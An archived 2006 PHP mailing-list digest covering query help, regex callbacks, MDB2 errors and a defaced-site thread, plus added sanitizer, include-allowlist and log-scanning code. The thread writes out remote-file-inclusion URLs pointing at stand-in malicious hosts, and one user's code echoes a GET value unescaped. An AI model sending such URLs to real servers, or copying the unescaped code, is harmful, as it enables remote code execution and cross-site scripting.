php-general Digest 13 Nov 2006 17:56:39 -0000 Issue 4457
Topics (messages 244543 through 244560):

one click - two actions?
    244543 by: Mel
    244545 by: John Meyer

Re: Parsing brackets in text
    244544 by: Roman Neuhauser
    244547 by: Dotan Cohen
    244551 by: Roman Neuhauser

Re: Mysql strategy
    244546 by: Dotan Cohen
    244558 by: Dotan Cohen

Re: How do you do the ? mark after a filename
    244548 by: Ivo F.A.C. Fokkema

server side security
    244549 by: H. Dan Phillips

Highjack?
    244550 by: tedd
    244559 by: Eric Butera
    244560 by: bruce

DOM Validation using PHP
    244552 by: Raphael Martins

Re: problem with imagestring()
    244553 by: Piotr Sulecki

MDB2 : never ending story
    244554 by: Alain Roger
    244555 by: Paul Scott
    244556 by: Alain Roger
    244557 by: Paul Scott
php-general Digest 14 Nov 2006 06:16:51 -0000 Issue 4458
Topics (messages 244561 through 244583):

Re: Highjack?
    244561 by: Matt Carlson
    244562 by: Rory Browne
    244563 by: bruce

Re: How do you do the ? mark after a filename
    244564 by: Norbert Ehart

Scrolling text
    244565 by: Alain Roger
    244566 by: Robert Cummings

Re: one click - two actions?
    244567 by: Mel
    244569 by: Warren Vail
    244571 by: Mel
    244577 by: Warren Vail

Problem with PHP 5.2.0
    244568 by: bluefx13.gmail.com
    244580 by: Kevin Waterson

Re: Mysql strategy
    244570 by: David Tulloh
    244572 by: Robert Cummings
    244578 by: Chris
    244579 by: Larry Garfield

Compressing both php and linked css files with ob_gzhandler and htaccess
    244573 by: Graham Anderson
    244574 by: Jochem Maas
    244575 by: Graham Anderson
    244576 by: Graham Anderson

Re: server side security
    244581 by: Chris
    244582 by: Ligaya A. Turmelle

Re: problem with php[4,5] (horde 2/3)
    244583 by: Chris
[PHP] one click - two actions?
Could someone please help me figure out how to show some description (where applicable) at the same time as I show an image, when I click on a link, without repeating the entire query?

The image and the description are both in the same table in my database.

I now show the image when I click on the link which is good, but the description stays on at all times instead of appearing only when active.

http://www.squareinch.net/single_page.php

This is the code I have for the image area:

<?php
/* query 1 from client */
$query = "SELECT * FROM client
          where status='active' or status='old'
          order by companyName";
$result = mysql_query($query) or die ("Couldn't execute query");

while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC))
{
    echo "<span class='navCompany'>{$aaa['companyName']}</span><span class='navArrow'> </span>\n";

    /* query 2 from job */
    $query = "SELECT * FROM job WHERE companyId='{$aaa['companyId']}'";
    $result2 = mysql_query($query) or die ("Couldn't execute query2");

    foreach($aaa as $jobType)
    {
        $bbb = mysql_fetch_array($result2,MYSQL_ASSOC);
        echo "<span class='navText'><a href='single_page.php?art=".$bbb['pix']."'>{$bbb['jobType']}</a></span>\n";
    }
    echo "<br>";
}
?>
</div>
<div class="navbox3"><?php $image = $_GET['art']; ?>
<img src="images/<?php print ($image) ?>" alt="Portfolio Item" border="0" width="285" height="285"></div>

This is the code I have for the description area:

<?php
/* query 1 from client */
$query = "SELECT * FROM client
          where status='active' or status='old'
          order by companyName";
$result = mysql_query($query) or die ("Couldn't execute query");

while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
{
    /* query 2 from job */
    $query = "SELECT * FROM job WHERE companyId='{$row['companyId']}'";
    $result2 = mysql_query($query) or die ("Couldn't execute query2");
    $url = mysql_query($result2);

    foreach($row as $url)
    {
        $row = mysql_fetch_array($result2,MYSQL_ASSOC);
        if ("url={$row['url']}")
            echo "<span class='navText'><a href='{$row['url']}'>{$row['web']}</a></span>";
    }
    echo "<br>";
}
?>
Re: [PHP] Parsing brackets in text
# [EMAIL PROTECTED] / 2006-11-13 01:35:44 +0200:
> On 13/11/06, Chris [EMAIL PROTECTED] wrote:
> > <?php
> > function makeLink($matches)
> > {
> >     $returnString="<b>" . $matches[1] . "</b>";
> >     return $returnString;
> > }
> >
> > $articleText="This is a very [long] string.";
> > $articleText=preg_replace_callback('/\[([a-z]+)\]/i' , "makeLink", $articleText);
> > print $articleText . "\n";
> > ?>
> >
> > The callback takes whatever the regular expression returns (alpha characters between [ and ]) and runs it through function makeLink.
> >
> > Not sure how that will go with multiple []'s etc in the same string but it should get you started.
>
> I didn't know that I had to call the function like that- I don't remember ever seeing it called that way.

It's done this way in all the examples on http://cz.php.net/manual/en/function.preg-replace-callback.php
What documentation did you read?

> Also, I must google the meaning of the (~+) in the regex.

No need to google: http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php
Skip the "Differences From Perl" section.

--
How many Vietnam vets does it take to screw in a light bulb?
You don't know, man. You don't KNOW.
Cause you weren't THERE. http://bash.org/?255991

--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
Re: [PHP] one click - two actions?
Not to be rude or anything, but if you want to do two things with one click, wouldn't the javascript list be the place you would want to go?

Mel wrote:
> Could someone please help me figure out how to show some description (where applicable) at the same time as I show an image, when I click on a link, without repeating the entire query?
>
> The image and the description are both in the same table in my database.
>
> I now show the image when I click on the link which is good, but the description stays on at all times instead of appearing only when active.
>
> http://www.squareinch.net/single_page.php
>
> This is the code I have for the image area:
>
> <?php
> /* query 1 from client */
> $query = "SELECT * FROM client
>           where status='active' or status='old'
>           order by companyName";
> $result = mysql_query($query) or die ("Couldn't execute query");
>
> while ($aaa = mysql_fetch_array($result,MYSQL_ASSOC))
> {
>     echo "<span class='navCompany'>{$aaa['companyName']}</span><span class='navArrow'> </span>\n";
>
>     /* query 2 from job */
>     $query = "SELECT * FROM job WHERE companyId='{$aaa['companyId']}'";
>     $result2 = mysql_query($query) or die ("Couldn't execute query2");
>
>     foreach($aaa as $jobType)
>     {
>         $bbb = mysql_fetch_array($result2,MYSQL_ASSOC);
>         echo "<span class='navText'><a href='single_page.php?art=".$bbb['pix']."'>{$bbb['jobType']}</a></span>\n";
>     }
>     echo "<br>";
> }
> ?>
> </div>
> <div class="navbox3"><?php $image = $_GET['art']; ?>
> <img src="images/<?php print ($image) ?>" alt="Portfolio Item" border="0" width="285" height="285"></div>
>
> This is the code I have for the description area:
>
> <?php
> /* query 1 from client */
> $query = "SELECT * FROM client
>           where status='active' or status='old'
>           order by companyName";
> $result = mysql_query($query) or die ("Couldn't execute query");
>
> while ($row = mysql_fetch_array($result,MYSQL_ASSOC))
> {
>     /* query 2 from job */
>     $query = "SELECT * FROM job WHERE companyId='{$row['companyId']}'";
>     $result2 = mysql_query($query) or die ("Couldn't execute query2");
>     $url = mysql_query($result2);
>
>     foreach($row as $url)
>     {
>         $row = mysql_fetch_array($result2,MYSQL_ASSOC);
>         if ("url={$row['url']}")
>             echo "<span class='navText'><a href='{$row['url']}'>{$row['web']}</a></span>";
>     }
>     echo "<br>";
> }
> ?>
Re: [PHP] Mysql strategy
On 13/11/06, Chris [EMAIL PROTECTED] wrote:
> Dotan Cohen wrote:
> > If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended:
> > 1) 30 searches, one for each keyword
>
> No. Horribly inefficient.
>
> > 2) To select the varchar field from all the rows, and search through them with php's array functions?
>
> No. Make the database do the work.
>
> Use full text indexing:
> http://dev.mysql.com/doc/refman/4.1/en/fulltext-search.html

Thanks, Chris, but that approach won't work as I don't know all the values that I'll be searching for at any one time. In fact, I only know one of them at a time. This is the makeLink function in another thread that you helped me in.

However, I do see other use of the full-text search functions in my future! This looks like it could save me quite a bit of work on another project.

Dotan Cohen
Re: [PHP] Parsing brackets in text
On 13/11/06, Roman Neuhauser [EMAIL PROTECTED] wrote:
> # [EMAIL PROTECTED] / 2006-11-13 01:35:44 +0200:
> > On 13/11/06, Chris [EMAIL PROTECTED] wrote:
> > > <?php
> > > function makeLink($matches)
> > > {
> > >     $returnString="<b>" . $matches[1] . "</b>";
> > >     return $returnString;
> > > }
> > >
> > > $articleText="This is a very [long] string.";
> > > $articleText=preg_replace_callback('/\[([a-z]+)\]/i' , "makeLink", $articleText);
> > > print $articleText . "\n";
> > > ?>
> > >
> > > The callback takes whatever the regular expression returns (alpha characters between [ and ]) and runs it through function makeLink.
> > >
> > > Not sure how that will go with multiple []'s etc in the same string but it should get you started.
> >
> > I didn't know that I had to call the function like that- I don't remember ever seeing it called that way.
>
> It's done this way in all the examples on http://cz.php.net/manual/en/function.preg-replace-callback.php
> What documentation did you read?

In the first example on that page, it looks to me like it should just return the text next_year, and not call that function. Obviously, it is my misunderstanding of the way that the function works, and not in the function itself.

I do learn php from TFM and this list, not from a course. Just like in any learning environment, I could misinterpret what is taught to me and need to ask a question, or not even know that I misinterpreted and not know that I need to ask a question. This is a case of the latter, clearly, because I have never needed to do anything other than a simple str_replace until now.

> > Also, I must google the meaning of the (~+) in the regex.
>
> No need to google: http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php
> Skip the "Differences From Perl" section.

That I have read at least three or four times. I still don't capture all of it, but I try. You are correct, I should have referenced that right away. It won't hurt for me to read it again, too. Thank you.

Dotan Cohen
Re: [PHP] How do you do the ? mark after a filename
On Sun, 12 Nov 2006 22:02:51 -0700, Thomas Bonham wrote:
> Thank you for that, it was a big help.
>
> Can I also call function that way?
>
> Again thank you for your help.
>
> Thomas

Do you mean:

/index.php?action=search

<?php
if (isset($_GET['action']) && $_GET['action'] == 'search') {
    search_items();
} else {
    view_all_items();
}
?>
[PHP] server side security
Let me begin by saying I'm a newbie to PHP and open source.

I setup a windows 2003 server with IIS6, PHP 5x and MYSQL5x for one of our developers to start building a new web based application. The developer will be using PHP myadmin for his purposes. The settings that were used were ones posted out on many web sites for this combo.

I'm looking for detailed instructions to secure the server from the standpoint of the server OS, php.ini and mysql. The developer will be securing access to the application from his end but I want to make sure that the server also remain secure. It will only be used within our intra-net and only by a handful of people.

Any and all suggestions will be greatly appreciated.

Thks

Dan Phillips
[PHP] Highjack?
Hi gang:

While this is not an obvious php question, it does deal with security which is a concern.

Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php.

You can see the result at:

http://xn--u2g.com/index1.php

It was not a terrible loss nor inconvenience, but I wonder how they did it.

Any ideas how this was done and suggestions as to how to prevent this from happening again?

Thanks,

tedd

--
---
http://sperling.com http://ancientstones.com http://earthstones.com
Re: [PHP] Parsing brackets in text
# [EMAIL PROTECTED] / 2006-11-13 15:02:53 +0200:
> > http://cz.php.net/manual/en/reference.pcre.pattern.syntax.php
> > Skip the "Differences From Perl" section.
>
> That I have read at least three or four times. I still don't capture all of it, but I try. You are correct, I should have referenced that right away. It won't hurt for me to read it again, too. Thank you.

Just keep reading it, but not without trying out various things yourself. I had a hard time hammering it into my head a few years ago, but it has been paying off like crazy. Your gain might vary.

--
How many Vietnam vets does it take to screw in a light bulb?
You don't know, man. You don't KNOW.
Cause you weren't THERE. http://bash.org/?255991
[PHP] DOM Validation using PHP
Hi there!

I'm building a form validator using PHP and JS. It's working fine by now, but I want to make a little improvement. Here is how it's working now:

1. The user fills the form. Every time he leaves the field, the JS code matches the value against a regexp to validate.
2. When the user submits the form, the PHP script matches all the values against the same regexp's.

Now, I want to validate my fields to prevent XSS, allowing my html tags but only the attributes that I want. I thought something like: (the tags and the valid attributes).

<?php
$form_html_validation = array(
    "p"      => array(),
    "a"      => array("href","name","rel"),
    "ol"     => array(),
    "ul"     => array(),
    "li"     => array(),
    "h2"     => array(),
    "h3"     => array(),
    "h4"     => array(),
    "h5"     => array(),
    "h6"     => array(),
    "strong" => array(),
    "em"     => array()
);

// Build the "<p><a><ol>..." list of tags that strip_tags() should keep.
$valid_elements = "<".join("><",array_keys($form_html_validation)).">";
$userInput = strip_tags($userInput,$valid_elements);

//perform DOM Attribute Validation
?>

But I don't know how to loop over every attribute for each tag in the DomTree. Does anyone have any ideas?

Thank You
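The attribute pass the post leaves as a comment can be done with PHP's DOM extension; the following is an added example, not code from the original message. The function names and the list of href schemes are assumptions; the scheme check is there because an attribute allowlist alone still lets an href carry a javascript: URL.

```php
<?php
// Added example, not code from the original post.
// Tag => attributes permitted on it, as in the post's $form_html_validation.
$form_html_validation = array(
    'p'  => array(), 'a'  => array('href', 'name', 'rel'),
    'ol' => array(), 'ul' => array(), 'li' => array(),
    'h2' => array(), 'h3' => array(), 'h4' => array(),
    'h5' => array(), 'h6' => array(),
    'strong' => array(), 'em' => array(),
);

// Assumption: only these URL schemes are acceptable in an href.
$allowed_schemes = array('http', 'https', 'mailto');

// True when $value is a relative URL or uses one of the allowed schemes.
function href_is_safe($value, array $schemes)
{
    // Browsers ignore whitespace and control characters inside a scheme,
    // so drop them before looking for "scheme:".
    $v = preg_replace('/[\x00-\x20]+/', '', $value);
    if (preg_match('/^([a-z][a-z0-9+.\-]*):/i', $v, $m)) {
        return in_array(strtolower($m[1]), $schemes, true);
    }
    return true; // no scheme: relative URL or fragment
}

function sanitize_html($html, array $allowed, array $schemes)
{
    $doc  = new DOMDocument();
    $prev = libxml_use_internal_errors(true);   // tolerate sloppy user markup
    // The xml prefix makes libxml read the input as UTF-8.
    $doc->loadHTML('<?xml encoding="UTF-8">' . $html);
    libxml_clear_errors();
    libxml_use_internal_errors($prev);

    $body = $doc->getElementsByTagName('body')->item(0);
    if ($body === null) {
        return '';
    }
    $xpath = new DOMXPath($doc);

    // Comments carry no allowed content; remove them.
    foreach (iterator_to_array($xpath->query('.//comment()', $body), false) as $c) {
        $c->parentNode->removeChild($c);
    }

    // Snapshot the elements first (the live list shifts during edits), then
    // walk in reverse document order so children come before their parents.
    $elements = iterator_to_array($xpath->query('.//*', $body), false);
    foreach (array_reverse($elements) as $el) {
        $tag = strtolower($el->nodeName);
        if (!isset($allowed[$tag])) {
            // Tag not on the list: keep only its text, which is escaped on output.
            $el->parentNode->replaceChild($doc->createTextNode($el->textContent), $el);
            continue;
        }
        // Attributes are already entity-decoded here, so "jav&#x61;script:"
        // is seen the same way a browser would see it.
        foreach (iterator_to_array($el->attributes, false) as $attr) {
            $name = strtolower($attr->nodeName);
            $ok   = in_array($name, $allowed[$tag], true);
            if ($ok && $name === 'href') {
                $ok = href_is_safe($attr->nodeValue, $schemes);
            }
            if (!$ok) {
                $el->removeAttributeNode($attr);
            }
        }
    }

    // Serialize only what was inside the body, not the html/body wrapper.
    $out = '';
    foreach ($body->childNodes as $child) {
        $out .= $doc->saveHTML($child);
    }
    return $out;
}

// Constructed sample input: event handler, style, obfuscated javascript: href,
// a script element and a class attribute, none of which are on the list.
$userInput = '<p onclick="alert(1)">Hi <a href="java&#x09;script:alert(1)" rel="nofollow" style="x">link</a>'
           . '<script>alert(2)</script> <em class="c">ok</em></p>';
echo sanitize_html($userInput, $form_html_validation, $allowed_schemes), "\n";
```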
[PHP] Re: problem with imagestring()
Ave!

Forget it. It turned out that the culprit was Debian-specific patch of libgd2. Sorry for bothering you.

Regards,

Piotr Sulecki.
[PHP] MDB2 : never ending story
Dear all,

i still got the same error when i run this code :
== Call to a member function fetchRow() on a non-object on line while ((

so it seems that package MDB2_Driver_pgsql is not loaded or something is wrong...
i'm really lost...4 days that i work on it without any solution...

$db2 = MDB2::connect($dsn, $options);
if (PEAR::isError($db2))
{
    die("Error connection : ".$db2->getMessage()."<br><br>".$db2->getUserinfo());
}
$res = $db2->exec($query);
if (PEAR::isError($res))
{
    die("Error connection : ".$res->getMessage()."<br><br>".$res->getUserinfo());
}
while (($row = $res->fetchRow()))
{
    echo $row[0] . "<br>";
}

--
Alain

Windows XP SP2
PostgreSQL 8.1.4
Apache 2.0.58
PHP 5
Re: [PHP] MDB2 : never ending story
On Mon, 2006-11-13 at 17:49 +0100, Alain Roger wrote:
> Dear all,
>
> i still got the same error when i run this code :
> == Call to a member function fetchRow() on a non-object on line while

Then why not try something else? Try this:

$db2 = MDB2::connect($dsn, $options);
if (PEAR::isError($db2)) {
    die("Error connection : ".$db2->getMessage()."<br><br>".$db2->getUserinfo());
}
$db2->setLimit($first, $count); //set the first row that you want and the number of rows after that that you want...
$res = $db2->exec($stmt);
if (PEAR::isError($res)) {
    $ret = false;
} else {
    .;

--Paul

All Email originating from UWC is covered by disclaimer http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
Re: [PHP] MDB2 : never ending story
And therefore how do you want to get the result set ?
nothing is solved now... i still need a fetchrow or fetchOne

On 11/13/06, Paul Scott [EMAIL PROTECTED] wrote:
>
> On Mon, 2006-11-13 at 17:49 +0100, Alain Roger wrote:
> > Dear all,
> >
> > i still got the same error when i run this code :
> > == Call to a member function fetchRow() on a non-object on line while
>
> Then why not try something else? Try this:
>
> $db2 = MDB2::connect($dsn, $options);
> if (PEAR::isError($db2)) {
>     die("Error connection : ".$db2->getMessage()."<br><br>".$db2->getUserinfo());
> }
> $db2->setLimit($first, $count); //set the first row that you want and the number of rows after that that you want...
> $res = $db2->exec($stmt);
> if (PEAR::isError($res)) {
>     $ret = false;
> } else {
>     .;
>
> --Paul

--
Alain

Windows XP SP2
PostgreSQL 8.1.4
Apache 2.0.58
PHP 5
Re: [PHP] MDB2 : never ending story
On Mon, 2006-11-13 at 18:07 +0100, Alain Roger wrote:
> And therefore how do you want to get the result set ?
> nothing is solved now... i still need a fetchrow or fetchOne

Have you read _any_ of the MDB2 docs??

<rant warning>
As far as I can see you have decided not to even _try_ any of the solutions that people on this list, and others, have given you... My final advice to you is RTFM and google it.
</rant warning>

--Paul
Re: [PHP] Mysql strategy
On 13/11/06, David Tulloh [EMAIL PROTECTED] wrote:
> Dotan Cohen wrote:
> > If I have to perform 30 LIKE searches for different keywords in a varchar field, which strategy would be recommended:
> > 1) 30 searches, one for each keyword
> > 2) To select the varchar field from all the rows, and search through them with php's array functions?
>
> It's not going to make a great deal of difference if you do the processing in the MySQL or the PHP, in this case it's basically the same operation in each. I suspect that efficiently recreating the LIKE functionality in PHP wouldn't be trivial to do, if you are just doing straight comparisons the MySQL STRCMP function should be faster.
>
> If you are worried about the speed of this query I'd suggest rethinking your database structure. Text field comparisons will always be relatively slow compared to numeric comparisons or numeric lookups. My reading of this query however is that it should be 30 OR comparisons, no joins involved. In this case the query will scale linearly with your database size so you shouldn't worry too much about it slowing down over time.

By that do you mean that it is O=n? Yes, it is linear. It's a matter of knowing if 30 LIKE queries are more efficient than one big query that brings down three fields (an INT and two VARCHAR's) for every row in the table.

Now that I'm thinking about it, I'm probably better off with one big query, as it is only one query, and I'd imagine that flipping through an array 30 times is faster than making 30 database calls.

Dotan Cohen

http://what-is-what.com/what_is/digg.html
Re: [PHP] Highjack?
On 11/13/06, tedd [EMAIL PROTECTED] wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security which is a concern.
>
> Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php.
>
> You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they did it.
>
> Any ideas how this was done and suggestions as to how to prevent this from happening again?
>
> Thanks,
>
> tedd
> --
> ---
> http://sperling.com http://ancientstones.com http://earthstones.com

Tedd,

I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing.

If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
RE: [PHP] Highjack?
eric...

you say how embarrassing regarding the $path.'foo'

i'm curious, why/how is this simple piece of code exploitable.

assuming $path is not something that comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched by external/client processes...

similarly, the 'foo' would be static, and couldn't be munged...

thoughts/explanations...

thanks

-----Original Message-----
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?

On 11/13/06, tedd [EMAIL PROTECTED] wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security which is a concern.
>
> Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php.
>
> You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they did it.
>
> Any ideas how this was done and suggestions as to how to prevent this from happening again?
>
> Thanks,
>
> tedd
> --
> ---
> http://sperling.com http://ancientstones.com http://earthstones.com

Tedd,

I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing.

If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
Re: [PHP] Highjack?
With register_globals on, the globals super array ($_POST, $_GET, $_REQUEST) are automatically populated into variables.

With that in mind www.example.com/index.php?path=remoteexplot.com/ would then yield include('remoteexplit.com/foo'); thus including ANY code they wish.

----- Original Message ----
From: bruce [EMAIL PROTECTED]
To: Eric Butera [EMAIL PROTECTED]; tedd [EMAIL PROTECTED]
Cc: PHP General List php-general@lists.php.net
Sent: Monday, November 13, 2006 11:55:13 AM
Subject: RE: [PHP] Highjack?

eric...

you say how embarrassing regarding the $path.'foo'

i'm curious, why/how is this simple piece of code exploitable.

assuming $path is not something that comes via the url vars (GET/POST/REQUEST) it shouldn't be able to be touched by external/client processes...

similarly, the 'foo' would be static, and couldn't be munged...

thoughts/explanations...

thanks

-----Original Message-----
From: Eric Butera [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 9:39 AM
To: tedd
Cc: PHP General List
Subject: Re: [PHP] Highjack?

On 11/13/06, tedd [EMAIL PROTECTED] wrote:
> Hi gang:
>
> While this is not an obvious php question, it does deal with security which is a concern.
>
> Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php.
>
> You can see the result at:
>
> http://xn--u2g.com/index1.php
>
> It was not a terrible loss nor inconvenience, but I wonder how they did it.
>
> Any ideas how this was done and suggestions as to how to prevent this from happening again?
>
> Thanks,
>
> tedd
> --
> ---
> http://sperling.com http://ancientstones.com http://earthstones.com

Tedd,

I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable. In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing.

If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt.
Fwd: [PHP] Highjack?
---------- Forwarded message ----------
From: Rory Browne [EMAIL PROTECTED]
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]

On 11/13/06, bruce [EMAIL PROTECTED] wrote:
> eric...
>
> you say how embarrassing regarding the $path.'foo'
>
> i'm curious, why/how is this simple piece of code exploitable. assuming $path is not something that comes via the url vars (GET/POST/REQUEST)

If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=

The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php

> it shouldn't be able to be touched by external/client processes...
>
> similarly, the 'foo' would be static, and couldn't be munged...
>
> thoughts/explanations...
>
> thanks
>
> -----Original Message-----
> From: Eric Butera [mailto:[EMAIL PROTECTED]
> Sent: Monday, November 13, 2006 9:39 AM
> To: tedd
> Cc: PHP General List
> Subject: Re: [PHP] Highjack?
>
> On 11/13/06, tedd [EMAIL PROTECTED] wrote:
> > Hi gang:
> >
> > While this is not an obvious php question, it does deal with security which is a concern.
> >
> > Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php.
> >
> > You can see the result at:
> >
> > http://xn--u2g.com/index1.php
> >
> > It was not a terrible loss nor inconvenience, but I wonder how they did it.
> >
> > Any ideas how this was done and suggestions as to how to prevent this from happening again?
> >
> > Thanks,
> >
> > tedd
> > --
> > http://sperling.com http://ancientstones.com http://earthstones.com
>
> Tedd,
>
> I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable.
>
> In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing.
>
> If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt .
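The include pattern discussed in this thread next to an allowlist-based replacement, as an added example that is not code from any poster. PAGES, vulnerable_include_target() and resolve_page() are hypothetical names, and the demo files are created in a temporary directory.

```php
<?php
// Added example; not code from the thread. All names here are hypothetical.

// With register_globals on, every request parameter became a global variable,
// so ?path=... set $path before include($path . 'script.php') ran.
// extract() reproduces that here. The function only returns the string that
// would have reached include(); it never includes anything.
function vulnerable_include_target(array $query): string
{
    $path = '';          // the original script relied on $path being unset
    extract($query);     // same effect as register_globals = On
    return $path . 'script.php';
}

// Hardened form: the request selects a key, the file name comes from a fixed
// map, and the resolved file must sit inside the include directory.
const PAGES = [
    'show'   => 'show.php',
    'search' => 'search.php',
];

function resolve_page(string $baseDir, $key): ?string
{
    // Arrays (?x[]=...) and unknown keys never reach the filesystem.
    if (!is_string($key) || !array_key_exists($key, PAGES)) {
        return null;
    }
    $base = realpath($baseDir);
    $file = realpath($baseDir . DIRECTORY_SEPARATOR . PAGES[$key]);
    if ($base === false || $file === false) {
        return null;     // directory or mapped file is missing
    }
    // Defence in depth: a symlinked or edited map entry must not escape $base.
    $prefix = $base . DIRECTORY_SEPARATOR;
    return strncmp($file, $prefix, strlen($prefix)) === 0 ? $file : null;
}

function demo(): array
{
    $dir = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'inc_demo_' . bin2hex(random_bytes(4));
    mkdir($dir);
    file_put_contents($dir . '/show.php', "<?php return 'show page';");
    file_put_contents($dir . '/search.php', "<?php return 'search page';");

    // Constructed request values; the URL is the one quoted in the thread.
    $values = [
        'search',
        'http://www.badserver.com/badscript.txt?dummy=',
        '../search',
        ['search'],
    ];
    $results = [];
    foreach ($values as $value) {
        $file = resolve_page($dir, $value);
        if ($file === null) {
            $results[] = 'rejected';
        } else {
            $results[] = (include $file);   // only allowlisted local files get here
        }
    }

    unlink($dir . '/show.php');
    unlink($dir . '/search.php');
    rmdir($dir);
    return $results;
}

// What the vulnerable script would have passed to include():
echo vulnerable_include_target(
    ['path' => 'http://www.badserver.com/badscript.txt?dummy=']
), "\n";

// What the allowlist does with the same kind of input:
print_r(demo());
```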
RE: [PHP] Highjack?
rory..

thanks.. i had meant to say assuming globals is off...

-----Original Message-----
From: Rory Browne [mailto:[EMAIL PROTECTED]
Sent: Monday, November 13, 2006 10:12 AM
To: PHP
Subject: Fwd: [PHP] Highjack?

---------- Forwarded message ----------
From: Rory Browne [EMAIL PROTECTED]
Date: Nov 13, 2006 7:12 PM
Subject: Re: [PHP] Highjack?
To: [EMAIL PROTECTED]

On 11/13/06, bruce [EMAIL PROTECTED] wrote:
> eric...
>
> you say how embarrassing regarding the $path.'foo'
>
> i'm curious, why/how is this simple piece of code exploitable. assuming $path is not something that comes via the url vars (GET/POST/REQUEST)

If register_globals is enabled, someone could
http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=

The script will then include
http://www.badserver.com/badscript.txt?dummy=script.php

> it shouldn't be able to be touched by external/client processes...
>
> similarly, the 'foo' would be static, and couldn't be munged...
>
> thoughts/explanations...
>
> thanks
>
> -----Original Message-----
> From: Eric Butera [mailto:[EMAIL PROTECTED]
> Sent: Monday, November 13, 2006 9:39 AM
> To: tedd
> Cc: PHP General List
> Subject: Re: [PHP] Highjack?
>
> On 11/13/06, tedd [EMAIL PROTECTED] wrote:
> > Hi gang:
> >
> > While this is not an obvious php question, it does deal with security which is a concern.
> >
> > Just this morning had a couple of my sites highjacked. What I found was someone had replaced my root level index.php with their own index.php.
> >
> > You can see the result at:
> >
> > http://xn--u2g.com/index1.php
> >
> > It was not a terrible loss nor inconvenience, but I wonder how they did it.
> >
> > Any ideas how this was done and suggestions as to how to prevent this from happening again?
> >
> > Thanks,
> >
> > tedd
> > --
> > http://sperling.com http://ancientstones.com http://earthstones.com
>
> Tedd,
>
> I've seen this happen before when someone was able to do a remote code execution exploit on an old version of a very popular open source shopping cart project. I'd say the first thing would be to try and find any include/require statements that are exploitable.
>
> In the case I was dealing with, it was a problem with register_globals on and an include that looked a bit like this include($path .'script.php');. How embarrassing.
>
> If you have access to your server logs look for urls such as http://example.com/exploited.php?action=http://evil.example.com/inject.txt .
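One way to run the log check suggested in this thread (added example, not a poster's code): it flags requests in which any query parameter decodes to a remote URL. The log lines are constructed and assume Apache common log format; the function names are hypothetical.

```php
<?php
// Added example; not code from the thread. Names and log lines are constructed.

// Split the query string by hand: request values here may themselves contain
// "://" and "?", which URL parsers do not always handle in a relative URI.
function request_params(string $uri): array
{
    $pos = strpos($uri, '?');
    if ($pos === false) {
        return [];
    }
    $params = [];
    foreach (explode('&', substr($uri, $pos + 1)) as $pair) {
        if ($pair === '') {
            continue;
        }
        $kv = explode('=', $pair, 2);
        $params[] = [urldecode($kv[0]), urldecode($kv[1] ?? '')];
    }
    return $params;
}

// Return one record per parameter whose decoded value starts with a URL scheme.
function find_remote_include_attempts(array $lines): array
{
    $hits = [];
    foreach ($lines as $i => $line) {
        // client ... "METHOD uri HTTP/x.y" status
        if (!preg_match('/^(\S+) .*?"[A-Z]+ (\S+) HTTP\/[0-9.]+" (\d{3})/', $line, $m)) {
            continue;
        }
        foreach (request_params($m[2]) as [$name, $value]) {
            if (preg_match('#^\s*(?:https?|ftps?)://#i', $value)) {
                $hits[] = [
                    'line'   => $i + 1,
                    'client' => $m[1],
                    'status' => (int) $m[3],   // 200 on an include script deserves a closer look
                    'param'  => $name,
                    'value'  => $value,
                ];
            }
        }
    }
    return $hits;
}

// Constructed sample log (documentation IP ranges, example.com hosts).
$log = [
    '192.0.2.10 - - [13/Nov/2006:09:12:01 -0500] "GET /index.php?x=search HTTP/1.1" 200 5120',
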